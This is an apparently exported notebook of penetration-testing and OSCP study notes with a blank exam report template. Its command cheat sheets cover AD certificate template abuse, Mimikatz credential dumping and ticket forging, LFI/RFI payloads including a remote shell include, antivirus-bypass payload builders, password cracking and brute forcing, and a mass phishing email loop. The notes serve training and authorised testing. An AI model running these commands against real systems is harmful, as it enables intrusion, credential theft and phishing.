  run pretender in order to receive and deny the Dynamic Update query sent to
  the relay IPv4 address.
- By default, in order to limit disruption during a DHCPv6 DNS Takeover, the
  option `--delegate-ignored-to <DNS server>` can be used to delegate ignored
  queries to a legitimate DNS server.
- The option `--dry-with-dhcp` can be combined with `--delegate-ignored-to` to
  monitor the name resolution queries in the network without disruption.
---

id: 8e90988aa8fd453bbf745cda12baea68
parent_id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132133
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 18f6442e342044bd785c48bacc2e7658e.md000644 0000000615 14666154175012562 0ustar00000000 000000 System Information

id: 8f6442e342044bd785c48bacc2e7658e
created_time: 2024-09-04T21:42:12.748Z
updated_time: 2024-09-04T21:58:14.210Z
user_created_time: 2024-09-04T21:42:12.748Z
user_updated_time: 2024-09-04T21:58:14.210Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 295258bce1c844ed480964e08f03eaf6b.md000644 0000003346 14666154175012647 0ustar00000000 000000 6. ESC4 Certificate Templates

Certificate templates are Active Directory objects with security descriptors that define the permissions AD principals have over them. Weak permissions or excessive access rights can allow non-privileged users to modify sensitive security settings in the template—such as defining EKUs, enabling SANs, or disabling manager approval—making it vulnerable to ESC1-3 exploitation techniques.


# Abusing ESC4 Certificates

Note: We need to use certipy to save the initial configuration of the certificate so that it can be restored later, and it will also modify the template configuration, which will make it vulnerable to ESC1-3.

## Certipy:

- `certipy-ad template -u "afsimmons@megacorpone.com" -p -template 'Vulnerable ESC4 template' -save-old'
-  `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable ESC4 template' -alt 'xadmin@megacorpone.com'
- `certipy-ad template -u "afsimmons@megacorpone.com" -p -template 'vulnerable ESC4 template' -configuration 'Vulnerable ESC4 template.json'


id: 95258bce1c844ed480964e08f03eaf6b
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-30T02:02:28.271Z
updated_time: 2024-08-30T03:00:40.259Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132267
user_created_time: 2024-08-30T02:02:28.271Z
user_updated_time: 2024-08-30T03:00:40.259Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 19537b357671141d2ab622763d0de16cf.md000644 0000000614 14666154175012402 0ustar00000000 000000 4. Email Services

id: 9537b357671141d2ab622763d0de16cf
created_time: 2024-09-04T21:42:12.304Z
updated_time: 2024-09-04T21:42:12.304Z
user_created_time: 2024-09-04T21:42:12.304Z
user_updated_time: 2024-09-04T21:42:12.304Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 29b7b1555b36345e0900909b03b19a6ef.md000644 0000003756 14666154175012415 0ustar00000000 000000 General Notes Linux

# Linux Commands to run:

- top
- htop
- ps -e
- ps aux
- ps aux | more
- ps aux | less

# Finding processes

- pgrep <process-name>

# Terminating a Process

- kill
- kill -9 PID
- pkill processName
- killall

# Kill user tty/pts sessions in Linux

## Commands

- `w`: show who is logged on and what they are doing
- `who`: show who is logged on
- `tty`: show current users pseudo terminal
- `ps -ft pts/1`: get process id for the pseudo terminal
- `pkill`: signal process based on name and other attributes

1. Check active users logged into the server with: `w`
```
 16:53:37 up 23:46,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
debian   pts/1    24.69.132.96     16:45    0.00s  0.04s  0.00s w
debain   pts/2    24.69.132.96:S.0 16:35   16.00s  0.02s  0.02s /bin/bash
```
2. Get the PID (Process ID) of a connected terminal (tty) with: `ps -ft pts/1`
```
UID        PID  PPID  C STIME TTY          TIME CMD
debian   28580 28102  0 16:45 pts/1    00:00:00 -bash
debian   29081 28580  0 16:55 pts/1    00:00:00 ps -ft pts/1
```
3. Kill the process: `kill 28580`

4. Alternatively use `pkill -t pts/1`

# Tools to check for running processes: 

## pspy

Source: https://github.com/DominicBreuker/pspy/releases/

In Kali (Linux client only): sudo apt install pspy 

- pspy --help




id: 9b7b1555b36345e0900909b03b19a6ef
parent_id: 9c500de3761a4d9abce573f091a67220
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-08-01T20:37:12.663Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132711
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-08-01T20:37:12.663Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 19c500de3761a4d9abce573f091a67220.md000644 0000000614 14666154175012536 0ustar00000000 000000 Running Processes

id: 9c500de3761a4d9abce573f091a67220
created_time: 2024-09-04T21:42:12.703Z
updated_time: 2024-09-04T21:58:09.732Z
user_created_time: 2024-09-04T21:42:12.703Z
user_updated_time: 2024-09-04T21:58:09.732Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 29c59a3d98f504cec8c622ed70c2faa4c.md000644 0000000624 14666154175013054 0ustar00000000 000000 2. Cracking Hashes Online

id: 9c59a3d98f504cec8c622ed70c2faa4c
created_time: 2024-09-04T21:42:12.882Z
updated_time: 2024-09-04T21:59:05.019Z
user_created_time: 2024-09-04T21:42:12.882Z
user_updated_time: 2024-09-04T21:59:05.019Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: dcb4d790b01144b7ada27167784dae15
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 29ce7a889dbb846f7879f6081c44a8d3a.md000644 0000000604 14666154175012666 0ustar00000000 000000 Passwords

id: 9ce7a889dbb846f7879f6081c44a8d3a
created_time: 2024-09-04T21:42:12.918Z
updated_time: 2024-09-04T21:58:33.013Z
user_created_time: 2024-09-04T21:42:12.918Z
user_updated_time: 2024-09-04T21:58:33.013Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 3b564ef55d0146539fe7746097d9d39c
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 29d7dc05020e2457aa0f89b932d45ff3f.md000644 0000004734 14666154175012640 0ustar00000000 000000 Mimikatz

# Mimikatz

## General Overview

Post exploitation commands must be executed from SYSTEM level privileges.
- mimikatz # privilege::debug
- mimikatz # token::whoami
- mimikatz # token::elevate
- mimikatz # lsadump::sam
- mimikatz # sekurlsa::logonpasswords
- mimikatz sekurlsa::tickets
- mimikatz sekurlsa::tspkg

Dump the Domain's Credentials without touching DC's LSASS and also remotely

- mimikatz lsadump::dcsync /domain:megacorpone.com /all

Dump old passwords and NTLM hashes of a user
- mimikatz lsadump::dcsync /user:megacorpone.com\afsimmons /history

List and Dump local kerberos credentials
- mimikatz kerberos::list /dump

List Vault Credentials: 
- mimikatz vault::list

## Pass The Hash

- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash

## Inject generated TGS key

- mimikatz # kerberos::ptt <ticket_kirbi_file>

## Generating a silver ticket 

AES 256 Key:

- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

AES 128 Key:

- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

NTLM:

- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>


## Generating a Golden Ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

AES 128 Key: 

- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

NTLM:

- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>







id: 9d7dc05020e2457aa0f89b932d45ff3f
parent_id: 533f89ee69a545b7a416b814f14e5d3d
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-09-04T05:31:37.239Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132662
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-09-04T05:31:37.239Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 19e044fa952a4470d882affd94d07030a.md000644 0000000603 14666154175012543 0ustar00000000 000000 Services

id: 9e044fa952a4470d882affd94d07030a
created_time: 2024-09-04T21:42:12.150Z
updated_time: 2024-09-04T21:43:12.339Z
user_created_time: 2024-09-04T21:42:12.150Z
user_updated_time: 2024-09-04T21:43:12.339Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: ab4c6b72385d4d8db33ad00069267585
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 29e1d733a4d6d4197ba0d2b9923b72083.md000644 0000001440 14666154175012463 0ustar00000000 000000 General Notes Linux

# Linux: 

- cat /etc/crontab
- cat /etc/anacrontab
- cat /etc/frontal
- cat /etc/anacron
- systemctl list-timers --all

id: 9e1d733a4d6d4197ba0d2b9923b72083
parent_id: f497f09817204252a2bcf9c1fb249673
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132732
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1a12f80c43c4042c0b9fbc006659d5843.md000644 0000002530 14666154175012450 0ustar00000000 000000 5. Villian Cheatsheet

# Installation:
sudo apt update&&sudo apt install gnome-terminal
git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

# Generating Payloads

## Main Logic: 

```
generate payload=<OS_TYPE/HANDLER/PAYLOAD_TEMPLATE> lhost=<IP or INTERFACE> [ obfuscate encode ]
```

## Session Defender
Villain has a function that inspects user issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell and more). Use the `cmdinspector` command to turn that feature on/off.  

Usage: 
```
cmdinspector <ON/OFF>
```

id: a12f80c43c4042c0b9fbc006659d5843
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-08-12T16:38:22.648Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132469
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-08-12T16:38:22.648Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1a52754855fd44a819c982b067bb4b96d.md000644 0000001341 14666154175012504 0ustar00000000 000000 Target

# Fill in results or other information about your target here: 







id: a52754855fd44a819c982b067bb4b96d
parent_id: f84682d45a1647729d438e74c92a474f
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132091
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1a71281060c5f4c5585079611849b42b3.md000644 0000005357 14666154175012176 0ustar00000000 000000 Enumerating Web Services


# Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

## Step 2: 

## Common Wordlists to use for Web App Scanning: 

Common Wordlists to use for Web Directory Scanning: 
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirbuster/*.txt
- /usr/share/wordlists/wfuzz/general/*.txt
- /usr/share/seclists/Discovery/Web-Content/
- Assetnote Wordlists: https://wordlists.assetnote.io/
- Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10

Common Wordlists to use for User Enumeration Scanning: 
- /usr/share/seclists/Usernames
- /usr/share/wordlists/dirbuster/apache-user-enum-2.0

## Web App Scanners


Wpscan(WordPress Scannner):

- wpscan --url https://megacorpone.com
- wpscan --url https://megacorpone.com --enumerate ap at (All Plugins, All Themes)
- wpscan --url https://megacorpone.com --enumerate u (Usernames)
- wpscan --url https://megacorpone.com --enumerate v



Other Tools: 
- Burp Suite
- OWASP Zap
- Cadaver
- SQLMap
- Joomscan
- Feroxbuster

## Testing for LFI: 

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples: 

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:

```
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
```

Windows:
```
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
```


## Testing for RFI: 

http://example.com/index.php?page=http://callback.com/shell.txt
http://example.com/index.php?page=http://callback.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt

## Resources

- Turning LFI to RFI: 
https://l.avala.mp/?p=241
Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241

id: a71281060c5f4c5585079611849b42b3
parent_id: 683f633e9ae24821b9411611851581bd
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T04:29:52.851Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132357
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T04:29:52.851Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1a7687a754bd943498fd221aa3098be45.md000644 0000004302 14666154175012501 0ustar00000000 000000 7. Bypassing AV

# Recent Tools to Bypass AV: 

## Scarecrow

Source: https://github.com/optiv/ScareCrow

In Kali: 

sudo apt install golang

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo

go build ScareCrow.go

./ScareCrow

## Donut: 

Source: https://github.com/TheWover/donut

## Freeze: 
Source: https://github.com/Tylous/Freeze

Installation

```
sudo apt install golang
go build Freeze.go
```

# Old tools to bypass AV
## Veil Framework:

Install on Kali: 
- apt install veil
- /usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veil

## Shellter

Source: https://www.shellterproject.com/download/

- apt install shellter


## Sharpshooter

Javascript Payload Stageless: 
- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload: 

- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooter


## Vulcan

Source: https://github.com/praetorian-code/vulcan



# Resources: 

- https://book.hacktricks.xyz/windows-hardening/av-bypass
- https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates



id: a7687a754bd943498fd221aa3098be45
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-09-04T04:49:31.427Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132482
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-09-04T04:49:31.427Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1a87dc6d06bd1410cb62094ab662bb974.md000644 0000003101 14666154175012605 0ustar00000000 000000 John The Ripper

DICTIONARY ATTACK
- john --format=#type --wordlist=dict.txt hash.txt

BRUTEFORCE ATTACK
- john --format=#type hash. txt

MASK ATTACK
- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6

INCREMENTAL ATTACK
- john --incremental hash.txt

DICTIONARY + RULES ATTACK
- john --format=#type --wordlist=dict.t


Other Notes:

BENCHMARK TEST
- john --test

SESSION NAME
- john hash.txt --session=example_name

SESSION RESTORE
- john --restore=example_name

SHOW CRACKED RESULTS
- john hash.txt --pot=<john potfile> --show

WORDLIST GENERATION
- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt

CRACKING SSH KEYS:

- /usr/share/john/ssh2john.py id_rsa > hash.john
- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john

CRACKING KRB5TGS KEYS

- john --format=krb5tgs --wordlist=<passwords_file krb-key.txt

Cracking ASREP Keys

- john --format=krb5asrep --wordlist=<passwords_file asrep-key.txt




id: a87dc6d06bd1410cb62094ab662bb974
parent_id: f5b6f52827df4dfd8523222cd85dcaa6
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132861
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1aaf2ec98c6874319b7d4eb1bbfb2fca6.md000644 0000002117 14666154175013210 0ustar00000000 000000 Medusa

- medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 

- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp

- medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 

- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222

- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt






id: aaf2ec98c6874319b7d4eb1bbfb2fca6
parent_id: 9c59a3d98f504cec8c622ed70c2faa4c
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132898
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1ab4c6b72385d4d8db33ad00069267585.md000644 0000000617 14666154175012470 0ustar00000000 000000 3. Enumeration Notes

id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-09-04T21:42:12.100Z
updated_time: 2024-09-04T21:43:16.929Z
user_created_time: 2024-09-04T21:42:12.100Z
user_updated_time: 2024-09-04T21:43:16.929Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2abf352a05cd74dae99a91be69a595acd.md000644 0000001564 14666154175013136 0ustar00000000 000000 General Notes Windows

# Check for Processes

- tasklist
- wmic process list full

# In PowerShell
- Get-Process
- Get-Process -Name 'Notepad'

List path where the process is running:
- (Get-Process -Name 'Calculator').Path


id: abf352a05cd74dae99a91be69a595acd
parent_id: 9c500de3761a4d9abce573f091a67220
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132719
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1ad63367a072541a29fc62116350ed585.md000644 0000005442 14666154175012323 0ustar00000000 000000 Enumerating Email Services

# SMTP Ports: 

25, 465, 587

## Manual Connection
```
$ nc -nv x.x.x.x 25
```

# SMTP Enumeration Tools

## Nmap Enumeration
```
$ ls -lh /usr/share/nmap/scripts/ | grep smtp
-rw-r--r-- 1 root root  4309 Oct 12 09:29 smtp-brute.nse
-rw-r--r-- 1 root root  4769 Oct 12 09:29 smtp-commands.nse
-rw-r--r-- 1 root root 12006 Oct 12 09:29 smtp-enum-users.nse
-rw-r--r-- 1 root root  5873 Oct 12 09:29 smtp-ntlm-info.nse
-rw-r--r-- 1 root root 10148 Oct 12 09:29 smtp-open-relay.nse
-rw-r--r-- 1 root root   716 Oct 12 09:29 smtp-strangeport.nse
-rw-r--r-- 1 root root 14781 Oct 12 09:29 smtp-vuln-cve2010-4344.nse
-rw-r--r-- 1 root root  7719 Oct 12 09:29 smtp-vuln-cve2011-1720.nse
-rw-r--r-- 1 root root  7603 Oct 12 09:29 smtp-vuln-cve2011-1764.nse
$ nmap x.x.x.x -p 25 -sV --script=exampleScript1.nse,exampleScript2.nse
```

## Metasploit: 

```
msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) set RHOSTS <IP address/target>
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) set USER_FILE <address of file>
msf auxiliary(smtp_enum) run
```

## smtp-user-enum
 - Install (Kali Linux): 
 ```
sudo apt install smtp-user-enum
```

```
$ smtp-user-enum -M VRFY -U users.txt -t 172.21.0.0
$ smtp-user-enum -M EXPN -u admin1 -t 172.21.0.0
$ smtp-user-enum -M RCPT -U users.txt -T server-ips.txt
$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 172.21.0.0
```

## Mass email

If you've collected emails from the target domain, you can use something like the following to send out super simple phishing emails. (Saw this on a HTB machine, keep expectations of success low in the real world)
```
$ while read mail; do swaks –to $mail –from IT@targetdomain.com –header "Subject: Credentials / Errors" –body "goto http://attackerIP/" –server x.x.x.x; done < mails.txt
```

# POP3 Enumeration

## Nmap Enumeration

```
$ ls -lh /usr/share/nmap/scripts/ | grep pop
-rw-r--r-- 1 root root  3953 Oct 12 09:29 pop3-brute.nse
-rw-r--r-- 1 root root  1397 Oct 12 09:29 pop3-capabilities.nse
-rw-r--r-- 1 root root  4941 Oct 12 09:29 pop3-ntlm-info.nse
$ nmap x.x.x.x -p 110 -sV --script=exampleScript1.nse,exampleScript2.nse
```

id: ad63367a072541a29fc62116350ed585
parent_id: 9537b357671141d2ab622763d0de16cf
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-07T17:05:20.945Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132311
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-07T17:05:20.945Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1ad6cb7f4e9f741f8ab75090810708ae1.md000644 0000000614 14666154175012633 0ustar00000000 000000 8. Other Services

id: ad6cb7f4e9f741f8ab75090810708ae1
created_time: 2024-09-04T21:42:12.398Z
updated_time: 2024-09-04T21:42:57.996Z
user_created_time: 2024-09-04T21:42:12.398Z
user_updated_time: 2024-09-04T21:42:57.996Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2ae4f3be8ea3848acb2e9817af509450d.md000644 0000000602 14666154175012771 0ustar00000000 000000 5. SNMP

id: ae4f3be8ea3848acb2e9817af509450d
created_time: 2024-09-04T21:42:12.326Z
updated_time: 2024-09-04T21:42:12.326Z
user_created_time: 2024-09-04T21:42:12.326Z
user_updated_time: 2024-09-04T21:42:12.326Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2b28686c45c354195b2a6fabad74b7685.md000644 0000026567 14666154175012576 0ustar00000000 000000 OSCP Report Template V1


# <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>

![d2550626a1c94aeebd273d43be0669c9.png](Pentest_Template_Master_4.0/_resources/d2550626a1c94aeebd273d43be0669c9.png)

## <div align="center">  student@emailaddress.com Student-ID </div>

###### <div align="center"> 2020-XX-XX </div>


<div style="page-break-after: always;"></div>

## Contents

- 1 Offensive Security Exam Penetration Test Report
   - 1.1 Introduction
   - 1.2 Objective
   - 1.3 Requirements
- 2 High-Level Summary
   - 2.1 Recommendations
- 3 Methodologies
   - 3.1 Information Gathering
   - 3.2 Penetration
      - 3.2.1 System IP: 192.168.x.x
         - 3.2.1.1 Service Enumeration
         - 3.2.1.2 Privilege Escalation
      - 3.2.2 System IP: 192.168.x.x
         - 3.2.2.1 Service Enumeration
         - 3.2.2.2 Privilege Escalation
      - 3.2.3 System IP: 192.168.x.x
         - 3.2.3.1 Service Enumeration
         - 3.2.3.2 Privilege Escalation
      - 3.2.4 System IP: 192.168.x.x
         - 3.2.4.1 Service Enumeration
         - 3.2.4.2 Privilege Escalation
      - 3.2.5 System IP: 192.168.x.x
   - 3.3 Maintaining Access
   - 3.4 House Cleaning
- 4 Additional Items
   - 4.1 Appendix - Proof and Local Contents:
   - 4.2 Appendix - Metasploit/Meterpreter Usage

<div style="page-break-after: always;"></div>

## Introduction

The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam.
This report will be graded from a standpoint of correctness and fullness to all aspects of the exam.
The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.

## Objective

The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network.
The student is tasked with following methodical approach in obtaining access to the objective goals.
This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
Use the sample report as a guideline to get you through the reporting.

## Requirements

The student will be required to fill out this penetration testing report fully and to include the following sections:

- Overall High-Level Summary and Recommendations (non-technical)
- Methodology walkthrough and detailed outline of steps taken
- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
- Any additional items that were not included

<div style="page-break-after: always;"></div>

# High-Level Summary

